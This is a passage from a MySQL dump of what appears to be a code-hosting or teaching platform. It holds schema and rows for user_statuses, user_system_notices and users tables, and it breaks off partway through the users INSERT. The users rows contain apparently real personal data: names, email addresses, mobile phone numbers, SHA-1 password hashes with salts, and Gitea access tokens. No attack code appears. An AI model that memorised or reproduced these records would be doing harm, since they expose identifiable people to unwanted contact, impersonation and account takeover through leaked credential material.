17:36:42',0),(17,NULL,0,18,'2018-12-19 09:06:30','2018-12-19 09:06:30',0),(18,NULL,0,19,'2019-01-15 09:36:50','2019-01-15 09:36:50',0),(19,NULL,0,20,'2019-01-18 09:54:22','2019-01-18 09:54:22',0),(20,NULL,0,21,'2019-01-25 11:44:49','2019-01-25 11:44:49',0),(21,NULL,0,22,'2019-01-25 11:44:49','2019-01-25 11:44:49',0),(22,NULL,0,23,'2019-01-25 11:44:49','2019-01-25 11:44:49',0),(23,NULL,0,24,'2019-01-25 11:44:49','2019-01-25 11:44:49',0),(24,NULL,0,25,'2019-01-25 11:44:50','2019-01-25 11:44:50',0),(25,NULL,0,26,'2019-01-25 11:44:50','2019-01-25 11:44:50',0),(26,NULL,0,27,'2019-01-25 11:44:50','2019-01-25 11:44:50',0),(27,NULL,0,28,'2019-01-25 11:44:50','2019-01-25 11:44:50',0),(28,NULL,0,29,'2019-01-25 11:44:50','2019-01-25 11:44:50',0),(29,NULL,0,30,'2019-01-25 11:44:50','2019-01-25 11:44:50',0),(30,NULL,0,31,'2019-03-13 16:32:19','2019-03-13 16:32:19',0),(31,NULL,0,32,'2019-03-13 16:32:20','2019-03-13 16:32:20',0),(32,NULL,0,33,'2019-03-13 16:32:20','2019-03-13 16:32:20',0),(33,NULL,0,34,'2019-03-13 16:32:20','2019-03-13 16:32:20',0),(34,NULL,0,35,'2019-03-13 16:32:20','2019-03-13 16:32:20',0),(35,NULL,0,36,'2019-03-13 16:32:20','2019-03-13 16:32:20',0),(36,NULL,0,37,'2019-03-13 16:32:20','2019-03-13 16:32:20',0),(37,NULL,0,38,'2019-03-13 16:32:20','2019-03-13 16:32:20',0),(38,NULL,0,39,'2019-03-13 16:32:21','2019-03-13 16:32:21',0),(39,NULL,0,40,'2019-03-13 16:32:21','2019-03-13 16:32:21',0),(40,NULL,0,41,'2019-03-21 21:28:44','2019-03-21 21:28:44',0),(41,NULL,0,42,'2019-04-09 15:27:41','2019-04-09 15:27:41',0),(42,NULL,0,43,'2019-04-17 09:49:36','2019-04-17 09:49:36',0),(43,NULL,0,44,'2019-04-18 11:06:17','2019-04-18 11:06:17',0),(44,NULL,0,45,'2019-06-09 11:31:04','2019-06-09 11:31:04',0),(45,NULL,1,46,'2019-08-06 08:33:43','2020-08-14 14:56:13',0),(46,NULL,0,47,'2019-08-06 09:10:25','2019-08-06 09:10:25',0),(47,NULL,0,48,'2019-08-06 09:24:30','2019-08-06 09:24:30',0),(48,NULL,0,49,'2019-08-07 09:33:05','2019-08-07 09:33:05',0),(49,NULL,1,50,'2019-08-07 09:37:08','2019-08-13 08:47:54',0),(50,NULL,0,51,'2019-08-07 14:53:28','2019-08-07 14:53:28',0),(51,NULL,0,52,'2019-08-07 15:44:39','2019-08-07 15:44:39',0),(52,NULL,1,53,'2019-08-13 09:30:25','2019-08-14 10:11:03',0),(53,NULL,0,54,'2019-08-14 16:50:06','2019-08-14 16:50:06',0),(54,NULL,0,55,'2019-08-17 08:59:42','2019-08-17 08:59:42',0),(55,NULL,0,56,'2019-09-16 09:59:25','2019-09-16 09:59:25',0),(56,NULL,0,57,'2019-10-10 16:48:10','2019-10-10 16:48:10',0),(57,NULL,0,58,'2019-10-19 09:24:20','2019-10-19 09:24:20',0),(59,NULL,0,60,'2019-10-29 10:00:26','2019-10-29 10:00:26',0),(60,NULL,0,61,'2019-10-29 17:07:24','2019-10-29 17:07:24',0),(61,NULL,0,62,'2019-10-29 17:08:25','2019-10-29 17:08:25',0),(62,NULL,0,63,'2019-10-31 18:37:10','2019-10-31 18:37:10',0),(63,NULL,0,64,'2019-10-31 18:37:10','2019-10-31 18:37:10',0),(64,NULL,0,65,'2019-10-31 18:37:10','2019-10-31 18:37:10',0),(65,NULL,0,66,'2019-10-31 18:37:10','2019-10-31 18:37:10',0),(66,NULL,0,67,'2019-10-31 18:37:11','2019-10-31 18:37:11',0),(67,NULL,0,68,'2019-10-31 18:37:11','2019-10-31 18:37:11',0),(68,NULL,0,69,'2019-10-31 18:37:11','2019-10-31 18:37:11',0),(69,NULL,0,70,'2019-10-31 18:37:11','2019-10-31 18:37:11',0),(70,NULL,0,71,'2019-10-31 18:37:11','2019-10-31 18:37:11',0),(72,NULL,0,73,'2019-11-25 11:25:31','2019-11-25 11:25:31',0),(73,NULL,0,74,'2020-02-01 12:47:12','2020-02-01 12:47:12',0),(74,NULL,2,75,'2020-02-01 18:52:39','2020-02-04 22:26:14',0),(75,NULL,1,76,'2020-02-01 20:34:46','2020-02-04 22:57:04',0),(76,NULL,2,77,'2020-02-01 22:26:36','2020-02-11 17:56:10',0),(77,NULL,0,78,'2020-02-03 17:19:19','2020-02-03 17:19:19',0),(78,NULL,1,79,'2020-02-04 22:00:19','2020-02-04 22:48:24',0),(79,NULL,1,80,'2020-02-04 22:09:45','2020-02-04 22:51:34',0),(80,NULL,0,81,'2020-02-05 10:29:30','2020-02-05 10:29:30',0),(81,NULL,0,82,'2020-02-05 10:30:48','2020-02-05 10:30:48',0),(82,NULL,0,83,'2020-02-05 10:31:59','2020-02-05 10:31:59',0),(83,NULL,0,84,'2020-02-05 10:33:10','2020-02-05 10:33:10',0),(84,NULL,0,85,'2020-02-05 10:35:26','2020-02-05 10:35:26',0),(85,NULL,0,86,'2020-02-05 10:38:36','2020-02-05 10:38:36',0),(86,NULL,0,87,'2020-02-05 10:39:59','2020-02-05 10:39:59',0),(87,NULL,0,88,'2020-02-05 10:43:18','2020-02-05 10:43:18',0),(88,NULL,0,89,'2020-02-05 10:54:45','2020-02-05 10:54:45',0),(89,NULL,0,90,'2020-02-05 10:54:48','2020-02-05 10:54:48',0),(90,NULL,0,91,'2020-02-05 10:55:15','2020-02-05 10:55:15',0),(91,NULL,0,92,'2020-02-05 10:56:00','2020-02-05 10:56:00',0),(92,NULL,0,93,'2020-02-05 10:58:38','2020-02-05 10:58:38',0),(93,NULL,0,94,'2020-02-05 11:02:30','2020-02-05 11:02:30',0),(94,NULL,0,95,'2020-02-05 11:05:02','2020-02-05 11:05:02',0),(95,NULL,0,96,'2020-02-05 11:24:55','2020-02-05 11:24:55',0),(96,NULL,0,97,'2020-02-05 11:41:14','2020-02-05 11:41:14',0),(97,NULL,0,98,'2020-02-05 12:24:57','2020-02-05 12:24:57',0),(98,NULL,0,99,'2020-02-05 14:48:32','2020-02-05 14:48:32',0),(99,NULL,0,100,'2020-02-05 14:53:15','2020-02-05 14:53:15',0),(100,NULL,0,101,'2020-02-05 15:22:57','2020-02-05 15:22:57',0),(101,NULL,0,102,'2020-02-05 16:25:27','2020-02-05 16:25:27',0),(102,NULL,0,103,'2020-02-10 12:21:33','2020-02-10 12:21:33',0),(103,NULL,0,104,'2020-03-19 13:54:38','2020-03-19 13:54:38',0),(104,NULL,0,105,'2020-03-19 15:08:51','2020-03-19 15:08:51',0),(105,NULL,0,106,'2020-03-19 15:09:00','2020-03-19 15:09:00',0),(106,NULL,0,107,'2020-03-19 15:10:11','2020-03-19 15:10:11',0),(107,NULL,0,108,'2020-03-19 15:12:55','2020-03-19 15:12:55',0),(108,NULL,0,109,'2020-03-19 15:13:24','2020-03-19 15:13:24',0),(109,NULL,0,110,'2020-03-23 08:27:59','2020-03-23 08:27:59',0),(110,NULL,1,111,'2020-07-03 11:51:05','2020-09-16 10:41:21',0),(111,NULL,0,112,'2020-08-12 10:41:20','2020-08-12 10:41:20',0),(112,NULL,0,114,'2020-08-14 08:58:42','2020-08-14 08:58:42',0),(113,NULL,0,116,'2020-09-29 17:20:40','2020-09-29 17:20:40',0),(114,NULL,0,117,'2020-10-21 16:47:58','2020-10-21 16:47:58',0),(115,NULL,0,118,'2020-12-01 18:18:16','2020-12-01 18:18:16',0),(116,NULL,0,119,'2020-12-02 13:18:32','2020-12-02 13:18:32',0),(117,NULL,0,120,'2020-12-14 14:31:53','2020-12-14 14:31:53',0),(118,NULL,0,121,'2020-12-16 16:06:31','2020-12-16 16:06:31',0),(119,NULL,0,122,'2020-12-16 18:54:54','2020-12-16 18:54:54',0),(120,NULL,0,123,'2020-12-17 10:03:56','2020-12-17 10:03:56',0),(121,NULL,0,124,'2020-12-17 11:17:58','2020-12-17 11:17:58',0),(122,NULL,0,125,'2020-12-17 11:22:00','2020-12-17 11:22:00',0),(123,NULL,0,126,'2020-12-18 18:53:33','2020-12-18 18:53:33',0),(124,NULL,0,127,'2020-12-22 19:48:05','2020-12-22 19:48:05',0),(125,NULL,0,128,'2020-12-24 15:19:18','2020-12-24 15:19:18',0),(126,NULL,0,129,'2020-12-27 11:43:54','2020-12-27 11:43:54',0),(127,NULL,0,130,'2020-12-28 11:28:50','2020-12-28 11:28:50',0),(128,NULL,0,131,'2020-12-29 11:32:47','2020-12-29 11:32:47',0),(129,NULL,0,132,'2020-12-29 15:12:24','2020-12-29 15:12:24',0),(130,NULL,0,133,'2020-12-29 15:21:31','2020-12-29 15:21:31',0),(131,NULL,0,134,'2020-12-29 15:24:04','2020-12-29 15:24:04',0),(132,NULL,0,135,'2020-12-30 10:05:30','2020-12-30 10:05:30',0),(133,NULL,0,136,'2021-01-05 10:33:26','2021-01-05 10:33:26',0),(134,NULL,0,137,'2021-01-05 18:41:43','2021-01-05 18:41:43',0),(135,NULL,0,138,'2021-01-06 10:52:46','2021-01-06 10:52:46',0),(136,NULL,0,139,'2021-01-06 11:04:59','2021-01-06 11:04:59',0),(137,NULL,0,140,'2021-01-06 11:12:28','2021-01-06 11:12:28',0),(138,NULL,0,141,'2021-01-06 11:21:36','2021-01-06 11:21:36',0),(139,NULL,0,142,'2021-01-06 11:29:06','2021-01-06 11:29:06',0),(140,NULL,0,143,'2021-01-06 11:39:56','2021-01-06 11:39:56',0),(141,NULL,0,144,'2021-01-06 11:47:58','2021-01-06 11:47:58',0),(142,NULL,0,145,'2021-01-06 14:02:22','2021-01-06 14:02:22',0),(143,NULL,0,147,'2021-01-06 14:44:32','2021-01-06 14:44:32',0),(144,NULL,0,148,'2021-01-06 14:55:48','2021-01-06 14:55:48',0),(145,NULL,0,149,'2021-01-06 15:44:03','2021-01-06 15:44:03',0),(146,NULL,0,150,'2021-01-06 15:49:27','2021-01-06 15:49:27',0),(147,NULL,0,151,'2021-01-06 16:24:56','2021-01-06 16:24:56',0),(148,NULL,0,152,'2021-01-07 15:22:45','2021-01-07 15:22:45',0),(149,NULL,0,153,'2021-01-13 11:04:29','2021-01-13 11:04:29',0),(150,NULL,0,155,'2021-01-22 15:35:26','2021-01-22 15:35:26',0),(151,NULL,0,156,'2021-01-26 09:20:08','2021-01-26 09:20:08',0),(152,NULL,0,157,'2021-01-26 18:22:00','2021-01-26 18:22:00',0),(153,NULL,0,158,'2021-01-28 15:58:35','2021-01-28 15:58:35',0),(154,NULL,0,159,'2021-01-28 18:25:28','2021-01-28 18:25:28',0),(155,NULL,0,160,'2021-01-28 23:13:23','2021-01-28 23:13:23',0),(156,NULL,0,161,'2021-02-20 09:25:51','2021-02-20 09:25:51',0),(157,NULL,0,162,'2021-02-20 09:26:03','2021-02-20 09:26:03',0),(158,NULL,0,163,'2021-02-20 09:32:12','2021-02-20 09:32:12',0),(159,NULL,0,164,'2021-02-20 09:37:18','2021-02-20 09:37:18',0),(160,NULL,0,165,'2021-02-20 09:43:56','2021-02-20 09:43:56',0),(161,NULL,0,166,'2021-02-20 09:44:37','2021-02-20 09:44:37',0),(162,NULL,0,167,'2021-02-20 09:48:11','2021-02-20 09:48:11',0),(163,NULL,0,168,'2021-02-20 09:58:40','2021-02-20 09:58:40',0),(164,NULL,0,169,'2021-02-20 10:13:42','2021-02-20 10:13:42',0),(165,NULL,0,170,'2021-02-20 10:34:59','2021-02-20 10:34:59',0),(166,NULL,0,171,'2021-02-20 10:41:53','2021-02-20 10:41:53',0),(167,NULL,0,172,'2021-02-20 11:02:05','2021-02-20 11:02:05',0),(168,NULL,0,173,'2021-02-20 13:26:03','2021-02-20 13:26:03',0),(169,NULL,0,174,'2021-02-20 14:13:03','2021-02-20 14:13:03',0),(170,NULL,0,175,'2021-02-20 14:22:16','2021-02-20 14:22:16',0),(171,NULL,0,176,'2021-02-20 19:46:56','2021-02-20 19:46:56',0),(172,NULL,0,177,'2021-02-21 14:02:23','2021-02-21 14:02:23',0),(173,NULL,0,178,'2021-02-22 22:37:00','2021-02-22 22:37:00',0),(174,NULL,0,179,'2021-02-24 14:52:39','2021-02-24 14:52:39',0),(175,NULL,0,180,'2021-02-24 17:51:46','2021-02-24 17:51:46',0),(176,NULL,0,181,'2021-02-25 08:42:05','2021-02-25 08:42:05',0),(177,NULL,0,182,'2021-02-25 08:49:07','2021-02-25 08:49:07',0),(178,NULL,0,183,'2021-02-25 14:01:01','2021-02-25 14:01:01',0),(179,NULL,0,184,'2021-02-26 10:24:40','2021-02-26 10:24:40',0),(180,NULL,0,185,'2021-02-26 20:15:44','2021-02-26 20:15:44',0),(181,NULL,0,186,'2021-03-01 19:03:56','2021-03-01 19:03:56',0),(182,NULL,0,187,'2021-03-01 22:07:13','2021-03-01 22:07:13',0),(183,NULL,0,189,'2021-03-03 07:35:42','2021-03-03 07:35:42',0),(184,NULL,0,190,'2021-03-04 10:12:27','2021-03-04 10:12:27',0),(185,NULL,0,191,'2021-03-04 10:16:31','2021-03-04 10:16:31',0),(186,NULL,0,192,'2021-03-04 10:17:21','2021-03-04 10:17:21',0),(187,NULL,0,193,'2021-03-04 10:19:53','2021-03-04 10:19:53',0),(188,NULL,0,194,'2021-03-04 10:19:59','2021-03-04 10:19:59',0),(189,NULL,0,195,'2021-03-04 10:20:06','2021-03-04 10:20:06',0),(190,NULL,0,196,'2021-03-04 10:27:32','2021-03-04 10:27:32',0),(191,NULL,0,197,'2021-03-04 10:28:07','2021-03-04 10:28:07',0),(192,NULL,0,198,'2021-03-04 10:29:41','2021-03-04 10:29:41',0),(193,NULL,0,199,'2021-03-04 10:42:07','2021-03-04 10:42:07',0),(194,NULL,0,200,'2021-03-04 11:10:46','2021-03-04 11:10:46',0),(195,NULL,0,201,'2021-03-05 10:32:57','2021-03-05 10:32:57',0),(196,NULL,0,202,'2021-03-05 11:23:45','2021-03-05 11:23:45',0),(197,NULL,0,203,'2021-03-05 13:12:22','2021-03-05 13:12:22',0),(198,NULL,0,204,'2021-03-05 14:19:55','2021-03-05 14:19:55',0),(199,NULL,0,205,'2021-03-05 14:37:57','2021-03-05 14:37:57',0),(200,NULL,0,206,'2021-03-05 22:04:34','2021-03-05 22:04:34',0),(201,NULL,0,207,'2021-03-06 17:19:19','2021-03-06 17:19:19',0),(202,NULL,0,208,'2021-03-06 17:26:16','2021-03-06 17:26:16',0),(203,NULL,0,209,'2021-03-06 18:04:36','2021-03-06 18:04:36',0),(204,NULL,0,210,'2021-03-06 19:56:38','2021-03-06 19:56:38',0),(205,NULL,0,211,'2021-03-07 23:20:59','2021-03-07 23:20:59',0),(206,NULL,0,212,'2021-03-09 16:01:16','2021-03-09 16:01:16',0),(207,NULL,0,213,'2021-03-09 16:20:16','2021-03-09 16:20:16',0),(208,NULL,0,214,'2021-03-09 16:43:12','2021-03-09 16:43:12',0),(209,NULL,0,215,'2021-03-09 21:49:19','2021-03-09 21:49:19',0),(210,NULL,0,216,'2021-03-10 18:03:19','2021-03-10 18:03:19',0),(211,NULL,0,217,'2021-03-11 07:02:07','2021-03-11 07:02:07',0),(212,NULL,0,218,'2021-03-11 15:05:29','2021-03-11 15:05:29',0),(213,NULL,0,219,'2021-03-12 20:36:44','2021-03-12 20:36:44',0),(214,NULL,0,220,'2021-03-13 11:50:02','2021-03-13 11:50:02',0),(215,NULL,0,221,'2021-03-13 14:46:34','2021-03-13 14:46:34',0);
|
||
/*!40000 ALTER TABLE `user_statuses` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `user_system_notices`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `user_system_notices`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `user_system_notices` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`notice_type` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_user_system_notices_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `user_system_notices`
|
||
--
|
||
|
||
LOCK TABLES `user_system_notices` WRITE;
|
||
/*!40000 ALTER TABLE `user_system_notices` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `user_system_notices` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `users`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `users`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `users` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`login` varchar(255) NOT NULL DEFAULT '',
|
||
`hashed_password` varchar(40) NOT NULL DEFAULT '',
|
||
`firstname` varchar(30) NOT NULL DEFAULT '',
|
||
`lastname` varchar(255) NOT NULL DEFAULT '',
|
||
`mail` varchar(60) DEFAULT NULL,
|
||
`admin` tinyint(1) NOT NULL DEFAULT '0',
|
||
`status` int(11) NOT NULL DEFAULT '1',
|
||
`last_login_on` datetime DEFAULT NULL,
|
||
`language` varchar(5) DEFAULT '',
|
||
`auth_source_id` int(11) DEFAULT NULL,
|
||
`created_on` datetime DEFAULT NULL,
|
||
`updated_on` datetime DEFAULT NULL,
|
||
`type` varchar(255) DEFAULT NULL,
|
||
`identity_url` varchar(255) DEFAULT NULL,
|
||
`mail_notification` varchar(255) NOT NULL DEFAULT '',
|
||
`salt` varchar(64) DEFAULT NULL,
|
||
`gid` int(11) DEFAULT NULL,
|
||
`visits` int(11) DEFAULT '0',
|
||
`excellent_teacher` int(11) DEFAULT '0',
|
||
`excellent_student` int(11) DEFAULT '0',
|
||
`phone` varchar(255) DEFAULT NULL,
|
||
`authentication` tinyint(1) DEFAULT '0',
|
||
`grade` int(11) DEFAULT '0',
|
||
`experience` int(11) DEFAULT '0',
|
||
`nickname` varchar(255) DEFAULT NULL,
|
||
`show_realname` tinyint(1) DEFAULT '1',
|
||
`professional_certification` tinyint(1) DEFAULT '0',
|
||
`ID_number` varchar(255) DEFAULT NULL,
|
||
`certification` int(11) DEFAULT '0',
|
||
`homepage_teacher` tinyint(1) DEFAULT '0',
|
||
`homepage_engineer` tinyint(1) DEFAULT '0',
|
||
`is_test` tinyint(4) DEFAULT '0',
|
||
`ecoder_user_id` int(11) DEFAULT '0',
|
||
`business` tinyint(1) DEFAULT '0',
|
||
`profile_completed` tinyint(1) DEFAULT '0',
|
||
`laboratory_id` bigint(20) DEFAULT NULL,
|
||
`platform` varchar(255) DEFAULT '0',
|
||
`gitea_token` varchar(255) DEFAULT NULL,
|
||
`gitea_uid` int(11) DEFAULT NULL,
|
||
`is_shixun_marker` tinyint(1) DEFAULT '0',
|
||
`is_sync_pwd` tinyint(1) DEFAULT '1',
|
||
`watchers_count` int(11) DEFAULT '0',
|
||
`enterprise_certification` tinyint(1) DEFAULT '0',
|
||
`admin_role` tinyint(20) DEFAULT '0',
|
||
`devops_step` int(11) DEFAULT '0' COMMENT '0: uninit devops; 1: unverified; 2: verified',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_users_on_homepage_engineer` (`homepage_engineer`),
|
||
KEY `index_users_on_homepage_teacher` (`homepage_teacher`),
|
||
KEY `index_users_on_ecoder_user_id` (`ecoder_user_id`),
|
||
KEY `index_users_on_laboratory_id` (`laboratory_id`),
|
||
KEY `index_users_on_login` (`login`),
|
||
KEY `index_users_on_mail` (`mail`),
|
||
KEY `index_users_on_type` (`type`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=222 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `users`
|
||
--
|
||
|
||
LOCK TABLES `users` WRITE;
|
||
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
|
||
INSERT INTO `users` VALUES (1,'innov','2dfc26e2a46bf0025b7cff23c7d6c4f7bc7b5f5a','','OpenSource','admin@example.net',1,1,'2021-03-14 10:17:46','',NULL,'2018-07-02 11:21:08','2021-03-11 03:46:37','User',NULL,'all','11b237e7cab6650fe33f4e9b02aa07f5',4,0,0,0,'18229727636',0,1601,0,'OpenSource',1,0,NULL,1,0,0,0,0,0,0,NULL,'forge','8afe2af66054a2d208f84360ce7d30ebda92a20d',2,0,1,0,0,0,0),(2,'','','','Anonymous','',0,3,NULL,'',NULL,'2018-07-02 11:27:49','2018-11-14 15:33:40','AnonymousUser',NULL,'',NULL,NULL,0,0,0,NULL,0,NULL,0,NULL,1,0,NULL,1,0,0,0,0,0,0,NULL,'0',NULL,NULL,0,0,0,0,0,0),(3,'p62453891','53bef94661f4548c907c6887139f543669cb1131','','戴傲','358551898@qq.com',0,1,'2018-07-20 08:50:18','',NULL,'2018-07-06 10:52:18','2018-07-20 11:14:40','User',NULL,'','5cc843a42324ef268508b1563ae27fe4',5,0,0,0,'15773138233',0,1000,0,'戴傲',1,0,NULL,1,0,0,0,0,0,0,NULL,'0','a14f4eff0be56c77fac6c31f456d701f0343a8fb',3,0,0,0,0,0,0),(4,'p49023187','d1cf42f1e09eb352d7bebe4ccfa6c3570defecc9','','李一一','52473355@qq.com',0,1,'2018-07-20 09:15:51','',NULL,'2018-07-08 10:28:20','2018-07-20 09:16:08','User',NULL,'','90059945f1a88907bda0c695a3261138',NULL,0,0,0,NULL,0,1000,0,'李一一',1,0,NULL,1,0,0,0,0,0,0,NULL,'0','becd8e115ada598c3eebc92d7124daa685e3d36d',4,0,0,0,0,0,0),(5,'p78602431','7b0bcb60018d707345ea3efedd9ae0355ec4e1ba','','王莉','521171493@qq.com',0,1,'2019-01-15 09:36:08','',NULL,'2018-07-20 09:16:39','2019-01-15 09:36:20','User',NULL,'day','0626715a45c8b3173bcf6ef5c1876bf6',3,0,0,0,NULL,0,NULL,0,'王莉',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','d8ed1d211ffde8395a87917a882a79f6eb96636b',5,0,0,0,0,0,0),(6,'p83921064','c97b3e78735579bdaaf0dc843e7f378dcd9d35f7','','黄井泉','huang@163.com',1,1,'2019-08-16 07:27:35','',NULL,'2018-07-20 14:47:43','2018-08-16 15:42:42','User',NULL,'day','579871c0eeb4e30c2524aa6d95f54d5b',6,0,0,0,'15388083362',0,NULL,0,'黄井泉',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','7c2251e364af6d77e22471746558a6abc32b1441',6,0,0,0,0,0,0),(7,'p57486102','6dc7bf338e3db77ac4416fa23190cf207ca5a96a','','杨义红','346300040@qq.com',0,1,'2018-08-20 14:11:22','',NULL,'2018-07-30 09:39:16','2018-07-30 09:39:51','User',NULL,'','d2afadbc63d6f4083e09990a5903737c',NULL,0,0,0,'17375771263',0,NULL,0,'杨义红',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','cc54fb9ae712f6b7b40fc8aa2f67eb71b6e0318e',7,0,0,0,0,0,0),(8,'p26948017','ee3c7b663fe8a1c6e89cd04b018d2889fa3a2363','','kosasa','test@126.com',0,1,'2019-09-20 09:22:06','',NULL,'2018-08-03 19:28:18','2018-08-03 19:28:49','User',NULL,'','00814a866a43f1d905b704a1d1242fd6',NULL,0,0,0,'18173242757',0,NULL,0,'kosasa~',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','104e5929290d5a2b4973d207834f011537c9cd55',8,0,0,0,0,0,0),(9,'p10749635','fb76632d0499f7ef8a981e0ac7bd5dca51957f1b','','Mr.Li','2402530756@qq.com',0,1,'2018-11-14 15:36:27','',NULL,'2018-08-06 15:18:46','2018-11-14 15:38:02','User',NULL,'','67a4fbc22f768da4207e361f708f460c',NULL,0,0,0,'13261628376',0,NULL,0,'Mr.Li',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','ec61190efb2201803023db14bd9cc088dfac26ec',9,0,0,0,0,0,0),(10,'p78659104','52f3356468c778c74b554ac1953aa219d23a8993','','尹刚','yingang@opengcc.org',0,1,'2018-10-07 17:28:52','',NULL,'2018-08-06 15:24:58','2018-08-06 15:27:59','User',NULL,'only_my_events','716ff1c688f2644762154dccb33bc7cd',NULL,0,0,0,'18670725296',0,NULL,0,'尹刚',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','fbb3d3cc23157410fa2c9c76498f54cd45fd8b60',10,0,0,0,0,0,0),(11,'p95107683','e284301529fe1a820dbec47b47c4dc29b4c4cf1a','','威少','153692771@qq.com',0,1,'2018-08-22 16:29:43','',NULL,'2018-08-21 17:13:35','2018-08-22 16:29:58','User',NULL,'day','34b3dde72c82010593a287922cb9eeb9',8,0,0,0,'15308497760',0,NULL,0,'OpenGCC',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','be7579b409eb1137023cf8669d0ffd36c802c94d',11,0,0,0,0,0,0),(12,'p25679804','59fa7abb5761a6ab210f2be633eea4381aac14f1','','陈正东','411763600@qq.com',0,1,'2018-11-14 15:32:08','',NULL,'2018-08-22 15:59:03','2018-08-22 15:59:29','User',NULL,'','9a6ac04c1d4b654e3d30eabf75c8c4fa',NULL,0,0,0,'13319550228',0,NULL,0,'哒哒哒',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','057e3e6c832652c37815ca7cd4f3f2a91adab1ee',12,0,0,0,0,0,0),(13,'p65284139','6b05be57ffbd8f8a6183dbd7e8b57ddf1617c152','','廖月明','18688920216@163.com',0,1,'2018-08-31 11:55:26','',NULL,'2018-08-30 22:28:07','2018-08-30 22:29:30','User',NULL,'','bc268222344fb3c480cb5229fc21875f',NULL,0,0,0,'18688920216',0,NULL,0,'廖月明',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','e11c6d4bb12053b0b9da4258068f1482bd880133',13,0,0,0,0,0,0),(14,'p76041529','41c415c9f1650598079f4a34b6dbbdc8e6e83ee2','','林沧','lc@mndisk.com',0,1,'2018-09-05 13:54:44','',NULL,'2018-09-05 13:54:44','2018-09-05 13:59:03','User',NULL,'','b21061f475f3a19c683ff051ed2973ee',NULL,0,0,0,'13302939135',0,NULL,0,'lc',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','f18fa99503234919a622e63f53ebe5fc2c09a353',14,0,0,0,0,0,0),(15,'p40918326','82faed9047b3269191ba4921b9017557acb0007c','','朵晶','duojing@163.com',0,1,'2018-11-14 16:59:36','',NULL,'2018-09-07 12:37:19','2018-11-13 09:04:32','User',NULL,'only_my_events','3a136f9e78905c21a94535e9b84ab6f5',NULL,0,0,0,'13910272339',0,NULL,0,'Duo',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','724c88ea0471d2b34d3f6d89735f96bd1e088dfa',15,0,0,0,0,0,0),(16,'p27318694','5a21a149ffa9c1eb508eea2a9ab96e83175751c4','','xamppp','xamppp@163.com',0,1,'2019-09-24 10:02:13','',NULL,'2018-10-10 09:29:20','2019-09-20 15:05:08','User',NULL,'day','1f1fc3e3f29d2b04b8c0e316d379aafc',26,0,0,0,'18230526151',0,NULL,0,'xamppp',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','f2ac869e023adff8e23187a6dd40b95a1c80759f',16,0,0,0,0,0,0),(17,'p86047591','4d9f114ff798e4116ab33c934ee7872a48481ad7','','金坰一','kyoungill.kim@sk.com',0,1,'2018-12-18 14:58:23','',NULL,'2018-10-12 17:36:42','2018-11-08 17:51:32','User',NULL,'','f478beffcb924e8a3a44e0f3638465b3',NULL,0,0,0,'18614295863',0,NULL,0,'kki0330',0,0,NULL,0,0,0,0,0,0,0,NULL,'0','5bd5e5a11c3a7505d143ff1089dddaa407119e85',17,0,0,0,0,0,0),(18,'p59231678','cd39c340275502c55c752f0bef025d7335434b69','','','',0,1,'2018-12-19 09:06:30','',NULL,'2018-12-19 09:06:30','2021-03-05 06:51:25','User',NULL,'','651731512a75958edcbd35b8ef1b1ffc',NULL,0,0,0,'18098901829',0,NULL,0,NULL,1,0,NULL,0,0,0,0,0,0,0,NULL,'forge','e3a9809f0a67d7459b4597907859af65d4e40122',148,0,0,0,0,0,0),(19,'p04153627','012d84eb4318e515475f859d9574665dfac70e2f','','李明','74555458@qq.com',0,1,'2019-01-21 09:48:45','',NULL,'2019-01-15 09:36:50','2019-01-21 09:51:05','User',NULL,'day','ead25fef1112333ee54fc8253e8bc5bb',9,0,0,0,'13548953938',0,NULL,0,'李明',1,0,NULL,0,0,0,0,0,0,0,NULL,'0','c6e54f0ddb7abddf834302bb8a357e824d113518',18,0,0,0,0,0,0),(21,'p96731420','add3abc95f2eb3dd410a357378d91d161e28a1c4','','郑淋','educoder0001@qq.com',0,1,'2019-01-25 11:47:33','',NULL,'2019-01-25 11:44:49','2019-01-25 11:44:49','User',NULL,'','1b1a691bf9aa2189790895bec7b07f09',NULL,0,0,0,'15607310001',1,NULL,0,'郑淋',1,1,NULL,1,0,0,0,0,0,0,NULL,'0','71063c69f3594ff8e94748123c0ac8095c64a9a6',19,0,0,0,0,0,0),(22,'p46352891','83bb4d73983ba89f2a84659f43de64f7c216aba1','','秦雨双','educoder0002@qq.com',0,1,'2019-03-21 20:31:18','',NULL,'2019-01-25 11:44:49','2019-02-20 